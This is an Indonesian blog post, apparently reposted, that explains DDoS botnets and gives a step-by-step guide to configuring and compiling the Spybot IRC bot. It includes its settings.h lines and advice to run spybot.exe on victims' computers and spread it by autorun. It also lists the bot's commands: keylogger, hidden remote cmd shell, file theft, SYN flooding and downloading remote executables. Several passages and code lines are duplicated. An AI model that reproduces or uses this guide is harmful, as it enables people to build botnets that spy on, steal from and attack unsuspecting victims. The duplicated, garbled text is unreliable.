Apa itu Ddos dan Spybot
Serangan yang paling menakutkan sampai detik ini masih tetap di
pegang oleh Ddos, forum sekelas kaskus pun juga pernah kena serangan ini
sehingga mereka down dan bahkan database nya hancur dan tidak bisa
direstore sehingga memaksa banyak thread yang di lock, serangan ini pula yang memaksa gedung putih memindahkan server mereka
setelah membuat marah hacker dari cina dan serangan yang membuat situs
microsoft tidak bisa diakses. Anda bisa membayangkan betapa berbahayanya
serangan tanpa obat seperti ini, tulisan ini saya kutip dari tulisan
R3yr3 yang memang selalu berbagi masalah security.Dengan tujuan berbagi
sesama dan belajar terutama dalam internet security. Hacker yang melancarkan serangan DDoS, haruslah mempunyai banyak komputer yang siap diperintah, komputer komputer ini dinamakan zombie, hacker akan memerintahkan
komputer zombie melalui perantara yang dinamakan sebagai master, disini
kita akan menggunakan perantara(master) yaitu mIRC, ketika sang hacker hendak melakukan serangan DDoS, ia hanya perlu
masuk ke komputer yang bertindak sebagai MASTER ini. Kemudian
memberikan perintah dari situ. Semua komputer zombie yang mendengarkan
perintah dari tuannya akan segera melakukan serangan terhadap komputer
korban yang di tentukan oleh hacker.
BAGAIMANA MENCARI ZOMBIE ?
Untuk melakukan serangan Ddos, syarat utamanya adalah memiliki pasuka
Zombie sebanyak banyaknya. Semakin banyak seseorang memiliki komputer
zombie, maka kekuatannya semakin besar dan dengan mudah ia bisa membuat
situs manapun yang tidak mempunyai bandwidh yang sebanding dengan nya
untuk down. Sebesar apapun bandwidh, pastilah ada batasnya dan ini
adalah inti dari serangan Ddos.
ZOMBIE TIDAK HANYA UNTUK DDOS
Seorang hacker yang memiliki banyak zombie, tidak hanya memanfaatkan
pasukannya untuk melakukan serangan Ddos. Hacker bisa melakukan banyak
sekali ha-hal yang mengerikan dengan pasukannya, diantaranya adalah :
1. Sebagai spammer.
2. Pay per click ( PPC ).
3. Pencurian bandwidh dan space, dan sekarang kita membahas cara membuatnya.
3. Pencurian bandwidh dan space, dan sekarang kita membahas cara membuatnya.
SPYBOT
Spybot merupakan salah satu bot yang terkenal di dunia Cyb3R atau
Und3R Gr0unD dan sangat luas digunakan oleh para hacker. Bot ini dibuat
dengan bahasa C oleh Mich yang sebelumnya disebarkan secara terbatas
melalui situsnya, karena program ini berupa source code, Anda harus melakukan proses
kompilasi yang sering menakutkan pengguna awam. Namun, Anda tidak perlu
khawatir, pembuat program ini telah menyediakan sebuah batch file yang
tinggal anda klik dana selesailah sudah, saya mendownload compiler gratis bahasa C seperti yang disarankan
yaitu lcc-win32, program ini saya akan upload. Sangatlah mudah dan
tidak ada yang perlu diceritakan lebih lanjut. Anda hanya perlu klik
next,next,finish dan selesai, file sumber spybot terdiri atas file spybot c yang merupakan source
kod file sedangkan konfigurasi disimpan pada file yang berbeda yaitu
settings h. Anda menetukan sifat dan karakterik file spybot yang hendak diciptakan melalui file settings ini.
Sebagai contoh nya, saya mengambil beberapa baris pntig pada file settings h
char password[] : “password anda”; //bots password
char channel[] : “#channel anda”; //channel bot joins on connect
char channel[] : “#channel anda”; //channel bot joins on connect
pada baris password[] merupakan password untuk memerintah bot, tanpa
mengetahui password ini, bot akan diam seribu bahasa ketika anda
perintahkan melakukan sesuatu, secara default, password yang digunakan adalah "password anda"
Secara deffault channel tersebut diset dengan #channelanda, mIRC mempunyai banyak sekali jaringan-jaringan yang berdiri sendiri.
Misalnya, server-server dalam kelompok dalnet, tidak bisa berhubungan
dengan server-server dalam kelompok undernet karena keduanya saling
berdiri sendiri, karena itu, kita juga perlu menentukan server mana channel
#channelanda akan dibuat. Baris yang menentukan hal ini berada pada
baris berikut :
//servers
char *ircservers[]={
“127.0.0.1″,
“irc.icq.com”,
NULL //dont remove this line
};
“127.0.0.1″,
“irc.icq.com”,
NULL //dont remove this line
};
//number of ports MUST be the same as the number of servers you use,
int serverports[]={
6667,
6666,
6667,
6666,
};
Secara deffault server yang akan digunakan dimasukkan kedalam array
bernama ircservers yang secara deffault menggunakan 127.0.0.1 dan server
irc.icq.com. Nomor port yang digunakan harus sesuai jumlahnya dengan
server yang digunakan karena menggunakan dua server, terdapat dua port
yang digunakan yaitu 6667 dan 6666, jika anda hendak merubahnya ke server dalnet misalnya, Anda juga
harus mengetahui port yang digunakan oleh server tersebut dan
mengisinya pada baris serverports[], untuk mengetahui nama server dan juga nama port server mIRC, Anda bisa mendownload list server-server mIRC dari internet, saya menggunakan software mIRC dan dari situ juga bisa dilihat dengan mengklik tombol
Option>Connect>Servers>Pilih Server IRC>Edit
Option>Connect>Servers>Pilih Server IRC>Edit
terlihat server irc.icq.com termasuk dalam kategori group IrCQNet, pada contoh ini saya tidak akan merubah server yang digunakan dan hanya
menghapus server lokal 127.0.0.1 karena memang tidak di perlukan, code
akhir setelah saya edit akan tampak seperti berikut :
char *ircservers[]={
“irc.icq.com”,
NULL //dont remove this line
};
“irc.icq.com”,
NULL //dont remove this line
};
//number of ports MUST be the same as the number of servers you use,
int serverports[]={
7000,
7000,
};
Setelah proses konfigurasi selesai dilakukan, saatnya untuk melakukan kompilasi.
Klik file “Make spybot.bat” yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban, anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban, dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini, Berikut adalah fungsi menarik yang tersedia, ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h
Klik file “Make spybot.bat” yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban, anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban, dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini, Berikut adalah fungsi menarik yang tersedia, ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h
Login password : untuk memerintahkan bot yang diberi password, anda harus login terlebih dahulu dengan perintah ini.
Raw [raw command] : mengirimkan perintah-perintah ke IRC. Anda bisa
mempelajari perintah IRC untuk mengetahuinya lebih lanjut (contoh: raw
PRIVMSG #spybot1.1:hello).
List [path+filter] : melihat file, sama dengan perintah dir. (contoh list c:*.*).
Delete [filename] : menghapus file (contoh : delete c:windowsnetstat.exe).
Executa [filename] : menjalankan file atau program. (contoh : execute
c:windowssystem32notepad.exe), program notepad akan di jalankan di
komputer zombie.
Rename [originalfile] [newfile] : merubah nama file (contoh : rename c:windowsnetstat.exe c:windowsnetstatbackup.bak).
Makedir [dirname] : membuat direktory (contoh : makedir c:test ).
Startkeylogger : menjalankan keylogger di komputer zombie.
Stop keylogger : mematikan keylogger di komputer zombie.
Sendkeys [keys] : mensimulasikan ketikan keyboard, anda bisa
mengirimkan ketikan keyboard dengan perintah ini, sebagai contohnya,
jika anda mengirimkan perintah “sendkeys zom-zom” maka tulisan om-zom akan terkirim, saya tidak mengetahui kenapa huruf pertamanya hilang namun, anda bisa
menceganya dengan menggunakan spasi di depan karakter yang hendak di
kirim.
Keyboardlights : menyalakan lampu keyboard sebanyak 50 kali ( tindakan iseng ).
Info : memberikan informasi tentang komputer zombie.
Listprocesses : melihat proses yang sedang berjalan di komputer zombie.
Killprocess [processname] : mematikan proses (contoh : killprocess firefox.exe).
Reconnect : memintah komputer zombi untuk disconnect dari server IRC dan melakukan koneksi kembali.
Disconnect [sec.] : meminta komputer zombie untuk disconnect dari IRC dalam beberapa waktu tertentu.
Quit : mematikan bot.
Reboot : reboot komputer zombie.
Cd-rom [0/1] : jika 0 maka akan menutup cd-rom, jika 1 maka akan membuka cd-rom.
Httpserver [port] [root-dir] : menjalankan fungsu server web. (contoh : httpserver 80 C: ).dengan perintah ini anda bisa mem-browse ke alamat IP zombie dan melihat semua file yang ada di drive C dengan browser.
Httpserver [port] [root-dir] : menjalankan fungsu server web. (contoh : httpserver 80 C: ).dengan perintah ini anda bisa mem-browse ke alamat IP zombie dan melihat semua file yang ada di drive C dengan browser.
Syn [host] [port] [delat msec.] [times] : melakukan serangan syn (contoh : syn 127.0.0.1 80 100 1000).
Threads : Menampilkan semua proses yang sedang di jalankan oleh bot.
Killthread [number] : mematikan proses, number adalah nomor yang di dapatkan pada threads sebelumnya.
Get [filename] : mengambil file yang ada di komputer zombie.
Opencmd : menjalankan program cmd pada komputer zombie dalam modus tersembunyi.
Cmd [command] : mengirim perintah (sebelumnya harus menggunakan opencmd).
Scan [start ip address] [port] [delay] [filename] : melakukan scanning (contoh : scan 127.0.0.1 17300 1 portscan.txt
Download [url] [filename] : mendownload file dari internet. (contoh : download http://127.0.0.0/server.exe c:server.exe
Uninstall : uninstall program bot dari komputer korban, perintah ini
akan membuat program bot tidak aktif lagi di komputer korban namun file
bot nya sendiri tidak terhapus.
loading...
loading...

Nice info Sob, ternyata banyak sekali orang2 jahil didunia ini ya, ... itu pasti dilatarbelakangi bisnis sepertinya.
ReplyDeleteiya..dan banyak sekali juga para hacker kena tangkap karena jahilnya
ReplyDelete